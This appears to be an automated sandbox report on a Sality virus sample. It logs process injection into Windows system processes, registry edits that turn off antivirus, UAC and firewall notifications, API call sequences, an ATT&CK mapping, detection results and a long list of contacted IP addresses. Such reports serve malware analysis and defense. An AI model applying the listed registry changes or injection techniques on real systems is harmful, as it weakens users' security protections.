        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 730000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 390000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 620000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D70000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 870000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 930000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 950000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: A90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 3250000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 150000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AD0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 410000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 940000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 360000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 740000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3A0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 630000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D80000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 880000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 940000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 960000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\explorer.exe base: 33C0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: D90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BA0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 160000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: AE0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 5D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 420000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 950000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1D0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A40000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dllhost.exe base: A60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: C50000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 370000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: B60000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\conhost.exe base: 750000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3B0000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 640000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: D90000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 890000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\dwm.exe base: 950000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\sihost.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: 970000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\svchost.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory written: C:\Windows\System32\ctfmon.exe base: AB0000Jump to behavior
        Source: dwm.exe, 00000005.00000000.1718963410.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
        Source: dwm.exe, 00000005.00000000.1719666848.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000008.00000000.1820211348.000001CD41221000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000009.00000000.1859358247.00000151A5061000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: dwm.exe, 00000005.00000000.1719666848.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000008.00000000.1820211348.000001CD41221000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000009.00000000.1859358247.00000151A5061000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: explorer.exe, 0000000D.00000002.4185243812.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1880009773.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman$
        Source: dwm.exe, 00000005.00000000.1719666848.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000008.00000000.1820211348.000001CD41221000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000009.00000000.1859358247.00000151A5061000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
        Source: dwm.exe, 00000005.00000000.1719666848.000002BAA8051000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000008.00000000.1820211348.000001CD41221000.00000002.00000001.00040000.00000000.sdmp, svchost.exe, 00000009.00000000.1859358247.00000151A5061000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Code function: 0_2_00903062 Sleep,Sleep,Sleep,GetLogicalDrives,GetDriveTypeA,lstrcat,CreateFileA,GetFileTime,FileTimeToSystemTime,ReadFile,CharLowerA,lstrlen,lstrcpy,GetFileAttributesA,CloseHandle,CreateFileA,WriteFile,CloseHandle,SetFileAttributesA,CloseHandle,GetFileAttributesA,SetFileAttributesA,DeleteFileA,CreateFileA,GetSystemTime,SystemTimeToFileTime,lstrcat,lstrcat,lstrlen,WriteFile,SetFileTime,CloseHandle,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,SetFileAttributesA,Sleep,RtlExitUserThread
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Code function: 0_2_00903B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Code function: 0_2_00901EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverride
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Registry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShell
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotifications
        Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | Registry value created: DisableNotifications 1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Code function: 0_2_008F7A3A htons,socket,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Code function: 0_2_008F83C9 socket,htons,bind,listen,accept,CreateThread,closesocket,RtlExitUserThread
        MITRE ATT&CK matrix (a leading number marks a technique matched by this sample and gives the number of matching signatures):

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | 12 Replication Through Removable Media | 2 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 6 Disable or Modify Tools | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Inhibit System Recovery
        Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 Windows Service | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 1 Credential API Hooking | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Bypass User Account Control | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Access Token Manipulation | 3 Software Packing | NTDS | 4 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Windows Service | 1 DLL Side-Loading | LSA Secrets | 13 System Information Discovery | SSH | Keylogging | 11 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 52 Process Injection | 1 Bypass User Account Control | Cached Domain Credentials | 111 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Masquerading | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
        Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 52 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
        Source | Detection | Scanner | Label | Link
        RHxJqGoGFB.exe | 95% | ReversingLabs | Win32.Virus.Sality |
        RHxJqGoGFB.exe | 100% | Avira | W32/Sality.AT |
        RHxJqGoGFB.exe | 100% | Joe Sandbox ML | |

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\odnhm.exe | 100% | Avira | W32/Sality.AT |
        C:\clmaq.pif | 100% | Avira | W32/Sality.AT |
        C:\Users\user\AppData\Local\Temp\rkuso.exe | 100% | Avira | W32/Sality.AT |
        C:\Users\user\AppData\Local\Temp\odnhm.exe | 100% | Joe Sandbox ML | |
        C:\clmaq.pif | 100% | Joe Sandbox ML | |
        C:\Users\user\AppData\Local\Temp\rkuso.exe | 100% | Joe Sandbox ML | |

        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
IP | Domain | Country | ASN | ASN Name | Malicious
                                                                                                      unknownViet Nam
                                                                                                      7552VIETEL-AS-APViettelGroupVNfalse
                                                                                                      114.41.80.242
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      3462HINETDataCommunicationBusinessGroupTWfalse
                                                                                                      59.9.134.51
                                                                                                      unknownKorea Republic of
                                                                                                      4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                      113.160.133.171
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      187.40.170.3
                                                                                                      unknownBrazil
                                                                                                      7738TelemarNorteLesteSABRfalse
                                                                                                      189.25.10.24
                                                                                                      unknownBrazil
                                                                                                      7738TelemarNorteLesteSABRfalse
                                                                                                      179.212.232.131
                                                                                                      unknownBrazil
                                                                                                      28573CLAROSABRfalse
                                                                                                      191.43.4.101
                                                                                                      unknownBrazil
                                                                                                      7738TelemarNorteLesteSABRfalse
                                                                                                      123.30.169.88
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      113.162.238.152
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      178.211.97.155
                                                                                                      unknownUkraine
                                                                                                      8788ADAMANTKyivUkraineUAfalse
                                                                                                      86.104.74.51
                                                                                                      unknownRomania
                                                                                                      50636TELE-ROM-ASstrAleeaPaciiBlB5Ap16ROfalse
                                                                                                      190.37.87.100
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      123.27.55.144
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      92.87.163.40
                                                                                                      unknownRomania
                                                                                                      9050RTDBucharestRomaniaROfalse
                                                                                                      190.206.225.183
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      190.204.201.41
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      202.164.40.66
                                                                                                      unknownIndia
                                                                                                      17917QTLTELECOM-AS-APQuadrantTeleventuresLimitedINfalse
                                                                                                      94.76.206.19
                                                                                                      unknownUnited Kingdom
                                                                                                      29550SIMPLYTRANSITGBfalse
                                                                                                      175.102.10.34
                                                                                                      unknownChina
                                                                                                      4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                                                                                      186.211.10.235
                                                                                                      unknownBrazil
                                                                                                      53156PortalSATTelecomBRfalse
                                                                                                      27.106.75.127
                                                                                                      unknownIndia
                                                                                                      45194SIPL-ASSysconInfowayPvtLtdINfalse
                                                                                                      118.69.244.25
                                                                                                      unknownViet Nam
                                                                                                      18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
                                                                                                      186.89.27.138
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      180.218.251.35
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      24164UBBNET-AS-TWUNIONBROADBANDNETWORKTWfalse
                                                                                                      110.164.71.147
                                                                                                      unknownThailand
                                                                                                      45758TRIPLETNET-AS-APTripleTInternetTripleTBroadbandTHfalse
                                                                                                      86.124.69.204
                                                                                                      unknownRomania
                                                                                                      8708RCS-RDS73-75DrStaicoviciROfalse
                                                                                                      89.37.188.218
                                                                                                      unknownUnited Kingdom
                                                                                                      209706NOOPUpstreamAS41108DEfalse
                                                                                                      115.254.32.245
                                                                                                      unknownIndia
                                                                                                      18101RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKCfalse
                                                                                                      177.70.129.10
                                                                                                      unknownBrazil
                                                                                                      266555ISPNETTELECOMUNICACOESLTDA-EPPBRfalse
                                                                                                      41.38.34.12
                                                                                                      unknownEgypt
                                                                                                      8452TE-ASTE-ASEGfalse
                                                                                                      182.73.61.11
                                                                                                      unknownIndia
                                                                                                      9498BBIL-APBHARTIAirtelLtdINfalse
                                                                                                      190.204.170.165
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      93.114.144.199
                                                                                                      unknownSpain
                                                                                                      34977PROCONO-ASESfalse
                                                                                                      202.59.129.35
                                                                                                      unknownBangladesh
                                                                                                      38017GLOBAL-TRANSIT-AS-SILBDRouteobjectofSquareInformatiXLtfalse
                                                                                                      61.135.18.66
                                                                                                      unknownChina
                                                                                                      4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                                                                                                      110.78.163.76
                                                                                                      unknownThailand
                                                                                                      131090CAT-IDC-4BYTENET-AS-APCATTELECOMPublicCompanyLtdCATTfalse
                                                                                                      190.36.155.238
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      31.211.133.88
                                                                                                      unknownBulgaria
                                                                                                      197897PETKOMBGfalse
                                                                                                      86.106.240.47
                                                                                                      unknownMoldova Republic of
                                                                                                      8926MOLDTELECOM-ASMoldtelecomAutonomousSystemMDfalse
                                                                                                      189.13.99.195
                                                                                                      unknownBrazil
                                                                                                      7738TelemarNorteLesteSABRfalse
                                                                                                      59.93.199.71
                                                                                                      unknownIndia
                                                                                                      9829BSNL-NIBNationalInternetBackboneINfalse
                                                                                                      119.189.3.27
                                                                                                      unknownChina
                                                                                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                                                      202.56.221.5
                                                                                                      unknownIndia
                                                                                                      24560AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServicesfalse
                                                                                                      190.147.184.75
                                                                                                      unknownColombia
                                                                                                      10620TelmexColombiaSACOfalse
                                                                                                      27.251.25.201
                                                                                                      unknownIndia
                                                                                                      10201DWL-AS-INDishnetWirelessLimitedBroadbandWirelessINfalse
                                                                                                      123.27.31.5
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      191.37.199.39
                                                                                                      unknownBrazil
                                                                                                      263404DIPELNETFOZBRfalse
                                                                                                      177.22.43.78
                                                                                                      unknownBrazil
                                                                                                      52981ConectaTecnologiaLTDABRfalse
                                                                                                      113.161.196.135
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      113.161.12.199
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      187.6.136.20
                                                                                                      unknownBrazil
                                                                                                      8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                                                                                                      98.126.7.202
                                                                                                      unknownUnited States
                                                                                                      35908VPLSNETUSfalse
                                                                                                      183.83.206.61
                                                                                                      unknownIndia
                                                                                                      18209BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdINfalse
                                                                                                      27.48.201.2
                                                                                                      unknownIndia
                                                                                                      23772ORTELNET-ASMsOrtelCommunicationsLtdINfalse
                                                                                                      117.196.243.174
                                                                                                      unknownIndia
                                                                                                      9829BSNL-NIBNationalInternetBackboneINfalse
                                                                                                      211.22.167.175
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      3462HINETDataCommunicationBusinessGroupTWfalse
                                                                                                      41.186.11.53
                                                                                                      unknownRwanda
                                                                                                      36890MTNRW-ASNRWfalse
                                                                                                      218.208.102.21
                                                                                                      unknownMalaysia
                                                                                                      4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                                                                                                      59.127.110.115
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      3462HINETDataCommunicationBusinessGroupTWfalse
                                                                                                      203.147.91.179
                                                                                                      unknownIndia
                                                                                                      45804MEGHBELA-INMEGHBELABROADBANDINfalse
                                                                                                      69.195.140.124
                                                                                                      unknownUnited States
                                                                                                      19969JOESDATACENTERUSfalse
                                                                                                      179.184.169.171
                                                                                                      unknownBrazil
                                                                                                      18881TELEFONICABRASILSABRfalse
                                                                                                      200.205.47.222
                                                                                                      unknownBrazil
                                                                                                      10429TELEFONICABRASILSABRfalse
                                                                                                      85.65.46.116
                                                                                                      unknownIsrael
                                                                                                      1680NV-ASNCELLCOMltdILfalse
                                                                                                      121.42.25.3
                                                                                                      unknownChina
                                                                                                      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                      59.161.19.29
                                                                                                      unknownIndia
                                                                                                      10199TATA-ASTataCommunicationsLtdINfalse
                                                                                                      201.81.99.192
                                                                                                      unknownBrazil
                                                                                                      28573CLAROSABRfalse
                                                                                                      181.44.61.173
                                                                                                      unknownArgentina
                                                                                                      27747TelecentroSAARfalse
                                                                                                      86.106.240.116
                                                                                                      unknownMoldova Republic of
                                                                                                      8926MOLDTELECOM-ASMoldtelecomAutonomousSystemMDfalse
                                                                                                      112.78.3.138
                                                                                                      unknownViet Nam
                                                                                                      45538ODS-AS-VNOnlinedataservicesVNfalse
                                                                                                      190.147.4.186
                                                                                                      unknownColombia
                                                                                                      10620TelmexColombiaSACOfalse
                                                                                                      118.69.54.5
                                                                                                      unknownViet Nam
